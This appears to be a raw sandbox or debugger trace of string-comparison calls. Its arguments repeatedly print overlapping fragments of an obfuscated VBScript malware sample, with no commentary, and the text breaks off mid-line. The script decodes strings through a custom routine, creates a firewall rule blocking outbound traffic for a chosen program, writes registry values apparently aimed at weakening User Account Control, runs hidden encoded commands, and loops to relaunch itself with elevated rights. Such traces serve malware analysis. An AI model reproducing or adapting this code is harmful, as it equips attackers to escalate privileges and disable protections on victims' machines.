bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 30 [0223.010] wcsncmp (_String1="\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0223.010] wcsncmp (_String1="End If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0223.010] wcsncmp (_String1="nd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0223.010] wcsncmp (_String1="d If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0223.010] wcsncmp (_String1=" If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), 